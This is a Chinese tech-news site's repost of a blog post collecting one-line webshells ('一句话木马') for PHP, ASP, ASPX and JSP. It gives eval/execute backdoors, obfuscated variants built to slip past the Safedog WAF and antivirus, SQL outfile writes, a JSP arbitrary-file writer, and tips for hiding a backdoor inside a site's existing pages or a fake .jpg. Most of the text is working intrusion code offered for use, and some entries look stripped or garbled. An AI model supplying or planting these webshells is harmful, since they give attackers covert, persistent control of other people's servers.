iis服务器助手广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >一句话木马大全
  • 598
分享到

一句话木马大全

php开发语言 2023-10-21 21:10:12 598人浏览 薄情痞子
摘要

PHP       //可执行命令一句话 普通一句话 ​​​ PHP系列 ​​​​​​​​   密码是 -7 过狗一句话 select '' into outfile 'C:/Inetpub/wwwroot/Mysql-

PHP

  
     

//可执行命令一句话

普通一句话

​​

PHP系列

​​​​​​​​    密码是  -7

过狗一句话

select '' into outfile 'C:/Inetpub/wwwroot/Mysql-PHP/1.php'
   PHP过狗 密码:x<%a=request(“gold”)%><%eval a%>​​fuck​​ 密码 4该日志目录不存在或权限不足,请检查设置!

几个变性的php–过防火墙

过狗效果都不错:

   这个是90发的密码-7​phpv9 高版本拿shell…/…/…/…/html/special/cc/index​

ASP

asp 一句话

<%execute(request(“cmd”))%><%execute request(“1”)%>ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾 密码a"%><%Eval(Request(chr(112)))%><%’ p​​<%Y=request(“xindong”)%> <%execute(Y)%>​​<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“xindong”))%>​​<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&"-"&“5”&")"&")")%>(密码是-7)

ASP过安全狗一句话

密码(pass)​​<% %>​​<%a=request(“zl”)%><%eval a%>

ASPX系列

ASPX一句话的 过安全狗效果不怎么样

不过我认为能支持aspx 百分之8/90支持asp

​<%@ Page Language = Jscript %><%var/-/-/P/-/-/=/-/-/“e”+“v”+/-/-/“a”+“l”+"("+“R”+“e”+/-/-/“q”+“u”+“e”/-/-/+“s”+“t”+“[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]”+“,”+"""+“u”+“n”+“s”/-/-/+“a”+“f”+“e”+"""+")";eval(/-/-/P/-/-/,/-/-/“u”+“n”+“s”/-/-/+“a”+“f”+“e”/-/-/);%> 密码 -7​​<%@ Page Language=“Jscript”%><%eval(Request.Item[“xindong”],“unsafe”);%>​​密码是WEBadmin

aspx一句话

<%@ Page Language=“Jscript” validateRequest=“false” %><%Response.Write(eval(Request.Item[“w”],“unsafe”));%>

JSP

<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>​​select ‘’ into outfile ‘C:/Inetpub/wwwroot/mysql-php/1.php’​

过护卫神的

<%E=request(“1”)%>abc

123456789<%execute E%>

原来代码是<%execute request(“cmd”)%> 把标签修改替换下来 为

execute request(“cmd”) 这样就避开了<%,%>符号!

表中数据段限制,一句话木马也写不下的情况

网络中流传的最小的木马代码是<%eval request("#")%> 如过连这也写不下怎么办?

将木马分开写就好了!<%Y=request(“x”)%> <%execute(Y)%> 这样分开写提交到数据库就没问题了!

不过,在ACCESS数据库中新增加的数据物理位置是在旧数据之前的,所以要先写<%execute(Y)%>部分。写好后在客户端写密码时除了填写"x"以外的任何字符都可以,如果填了"x"就会出错!

插入一句话容易爆错

例如

Sub unlockPost()​​Dim id,replyid,rs,posttable​​id=Request(“id”)​​replyid=Request(“replyid”)​​If Not IsNumeric(id) or id="" Then​

写成

Sub unlockPost(<%eval request("#")%>)​​Dim id,replyid,rs,posttable​​id=Request(“id”)​​replyid=Request(“replyid”)​​If Not IsNumeric(id) or id="" Then

就可以了,也可以写成带容错语句的格式!!

<%if request(“cmd”)<>""then execute request(“cmd”)%>

一句话木马到两句话木马的转型!

一句话木马服务端原型:<%execute request(“value”)%> ,

变形后:<%On Error Resume Next execute request(“value”)%> ,

至于为什么要用两句话木马呢,是由于使我们的后门更加隐蔽.

我也试过用一句话插入WellShell的某个ASP文件里面,可是访问时经常出错,而插入两句话木马服务端却可以正常访问了,对站点的页面无任何影响.

这样就达到了隐蔽性更强的目的了,他管理员总不会连自己的网页文件都删了吧.

现在我的WellShell都有这样的后门.选择要插入两句话木马的ASP文件要注意,选一些可以用IE访问的ASP文件,不要选conn.asp这样的文件来插入.

当然,连接两句话木马的客户端仍然是用一句木马的客户端,不用修改.

一句话免杀:

一:变形法

比如:eval(request("#"))这样的马儿呢,一般情况下是不被杀的。但实际上,经常杀毒软件会把eval(request列为特征码。所以我们变形一下

​E=request(“id”)​​eval(E)

这样可达到免杀的目的。

例如:<%execute request(“1”)%> 变形后:

<%E=request(“1”)​​execute E%>

当然,这种变形是最好做的。

介绍第二种方法:因为很多管理员很聪明,它会检查ASP文件中的execute和eval函数。所以呢,不管你怎么反编译,它最终总是要用其中的一个函数来解释运行,所以还是被发现了。好么,我们用外部文件来调用。建一个a.jpg或者任何不被发现的文件后缀或文件名。写入 execute(request("#"))当然,你可以先变形后现放上去。然后在ASP文件中插入

来引用它,即可。

不过,管理员可以通过对比文件的方式找到修改过的文件,不过这种情况不多。

在WEBSHeLL中使用命令提示

在使用ASP站长助手6.0时点击命令提示符显示“没有权限”的时候,可以使用ASP站长助手上传CMD.exe到你的WEBSHELL目录(其它目录也行,把上传以后的CMD.exe绝对路径COPY出来),再修改你的WEBSHELL找到调用CMD.EXE的代码。原来的代码如下

.exec("cmd.exe /c "&DefCmd).stdout.readall

修改为

.exec(“你想上传的cmd.exe绝对路径” /c"&DefCmd).stdout.readall

比如你上传到的目录是D:\web\www\cmd.exe,那么就修改成

.exec(“D:\web\www\cmd.exe /c”&DefCmd).stdout.readall

支持变异菜刀连接以过安全狗,过啊D 文件扫描的一句话

实已经不是一句话了,好几句了都。

继续上次的:我使用的一句话的几种姿态

这回研究了下PHP,发一下我使用的一句话(可过文件扫描)。

ASP

密码z,支持菜刀连接;支持变异菜刀连接以过安全狗。

另外:

ASP

<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"//",""""),"*",vbCrlf)End FunctionExecute MorfiCoder(")//z/*/(tseuqer lave") %>

ASPX

<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); %>

来源地址:https://blog.csdn.net/2301_76786857/article/details/131213615

--结束END--

本文标题: 一句话木马大全

本文链接: https://www.lsjlt.com/news/434131.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • 一句话木马大全
    PHP       //可执行命令一句话 普通一句话 ​​​ PHP系列 ​​​​​​​​   密码是 -7 过狗一句话 select '' into outfile 'C:/Inetpub/wwwroot/mysql-...
    99+
    2023-10-21
    php 开发语言
  • java安全——jsp一句话木马
    jsp回显一句话木马 文章目录 jsp回显一句话木马一、搭建web服务1、创建空白maven项目,搭建本地tomcat2、引入servlet的pom依赖 二、无回显一句话三、带回显一句话三...
    99+
    2023-10-23
    java 安全 servlet
  • PHP一句话木马浅析
    一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。PHP一句话木马的原理是利用了PHP中的eval()。 一句话木...
    99+
    2023-09-07
    php 开发语言 Powered by 金山文档
  • php一句话木马变形技巧
    目录一、什么是一句话木马?二、我们如何发送命令,发送的命令如何执行?0.eval函数1.assert函数2.create_function函数3. call_user_func回调函...
    99+
    2024-04-02
  • eval与assert执行一句话木马
    首先介绍一下木马中最简单的存在,俗称一句话木马 eval() eval(str)是把str字符串按照php代码来计算或执行 该str字符串必须是合法的PHP代码,且必须以分号结尾 assert() assert()包含于头文件assert...
    99+
    2023-09-10
    php
  • eval与assert一句话木马分析
    eval与assert一句话木马分析 严正声明:本文仅限于技术讨论,严禁用于其他用途。 文章目录 eval与assert一句话木马分析前言一、eval定义和用法二、assert的定义与用法三、...
    99+
    2023-09-02
    php 开发语言
  • 蚁剑连接一句话木马演示
    需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php 的一句话木马 其他脚本语言的一句话木马使用过程和这个差别不大 在服务...
    99+
    2023-09-16
    安全 php 扫描测试工具 渗透测试
  • php图片一句话木马使用方法
    php图片一句话木马使用方法,PHP一句话: 1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']); 2、动态执行assert生成一个木马文件(隐藏性最好的一种)@$_GET['a']($_GET[...
    99+
    2023-09-06
    php木马 Powered by 金山文档
  • Java中JS引擎实现的一句话木马
    目录前言基本原理获取脚本引擎绑定对象eval基本语法调用Java方法导入Java类型创建Java类型的数组导入Java类方法调用与重载Payload结构设计语法问题的坑两种语言对象间...
    99+
    2024-04-02
  • 【python实现生成隐藏的一句话木马】
      如今,各大杀毒软件死死的盯着那几个危险函数不放。但是还有些人喜欢通过检索 webshell 关键字这样批量去找,这就更不可能找到了。那么今天这个 webshell 的原理是什么呢?这个webshell的原理就是:每一行最后都有空格与制表...
    99+
    2023-10-06
    python php
  • PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
    一句话木马如下,利用文件上传漏洞,往目标网站上传该木马,即可获取和控制整个网站主机目录 语句解析 @符号 @符号表示后面的语句即使执行错误,也不报错。 eval()函数 eval()函数的作用是把括号内的字符串全部当作php代码来执行。 ...
    99+
    2023-08-31
    php 网络安全
  • 一句话木马@eval($_POST[“cmd“]);是什么意思(超详细)
    在文件上传(upload)类ctf题中,相信大家都接触过一句话木马 那么具体它是扫描意思呢 POST 是html中标签的POST方法 在页面中,所有的POST方法都会由submit输入方式向action中的php文件返还信息,通...
    99+
    2023-09-03
    php 安全 开发语言 upload html5
  • 如何实现phpmyadmin弱密码导致一句话木马上传
    这篇文章将为大家详细讲解有关如何实现phpmyadmin弱密码导致一句话木马上传,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。1.打开phpmyadmin(一般防火墙不能...
    99+
    2024-04-02
  • 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
    1、常见漏洞分类  2、常见验证手段    可抓包后修改扩展名为图片格式,再上传可绕过验证。如:   可以修改php文件后缀为其他,再上传。如test.php.xxx  可对图片文件添加一句话木马,再修改为.php上传,会解析为图...
    99+
    2023-09-04
    php 安全 运维 linux
  • 大神说的一句话说清楚一个概念
    1.分布式 把一个项目拆成几个部分,然后分别交给不同的人或部门去完成,部门与部门之间互相团结协作共同完成这个大项目。 2.集群 集群就是大家一起干活,负载均衡就是每个人干的都差不多(在同一个项目里),不能把某个人累死,也不能让某个人闲死。...
    99+
    2023-01-30
    一句 大神 概念
  • 30岁了,说几句大实话
    是的,我 30 岁了,还是周岁。 就在这上个月末,我度过了自己 30 岁的生日。 都说三十而立,要对自己有一个正确的认识,明确自己以后想做什么,能做什么。 想想时间,过得真快。 过五关斩六将,高考、本科、读研,一路读下来,像我这种北方念书晚...
    99+
    2023-10-12
    程序人生 职场和发展
  • python如何输出一句话
    python输出一句话的方法:在python中可以使用print函数进行打印输出,该函数在Python3.x是一个函数,但在 Python2.x版本不是一个函数,只是一个关键字。具体操作步骤:首先打开python编辑器,新建一个python...
    99+
    2024-04-02
  • SQL语句大全(3)
    1、1=1,1=2的使用,在SQL语句组合时用的较多 “where 1=1” 是表示选择全部    “where 1=2”全部不选, 如: if @strWhere !=''  begin set @strSQ...
    99+
    2023-01-31
    语句 大全 SQL
  • php怎么查询笑话大全
    本教程操作环境:windows7系统、PHP8.1版、DELL G3电脑基于PHP的笑话大全接口调用示例...
    99+
    2024-04-02
  • php如何查询笑话大全
    这篇文章主要介绍“php如何查询笑话大全”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“php如何查询笑话大全”文章能帮助大家解决问题。php查询笑话大全的方法:1、开通笑话大全接口服务,获取接口的调...
    99+
    2023-07-04
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作